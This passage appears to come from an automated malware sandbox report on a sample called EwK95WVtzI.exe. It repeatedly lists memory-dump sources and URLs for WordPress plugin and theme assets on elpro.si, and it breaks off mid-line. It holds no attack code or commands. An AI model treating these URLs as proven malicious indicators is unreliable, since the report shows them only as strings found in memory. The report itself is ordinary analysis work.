00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ve
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4-wc
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-style
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-vendo
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/wp-smush-pro/app/assets/js/smush-lazy-load.min.js?ver=3.14.1
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/yith-woocommerce-wishlist/assets/css/font-awesome.css?ver=4.7
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/yith-woocommerce-wishlist/assets/css/jquery.selectBox.css?ver
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/yith-woocommerce-wishlist/assets/css/style.css?ver=3.23.0
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/yith-woocommerce-wishlist/assets/js/jquery.selectBox.min.js?v
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/yith-woocommerce-wishlist/assets/js/jquery.yith-wcwl.min.js?v
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/themes/elpro/css/style.css?ver=6.2.2
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/themes/elpro/favicon.png
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/themes/elpro/img/ICO-30-Kosarica.svg
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/themes/elpro/img/ICO-30-Linked-Grey.svg
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/themes/elpro/img/ICO-30-Search-Grey.svg
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/themes/elpro/img/ICO-30-Search-White.svg
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 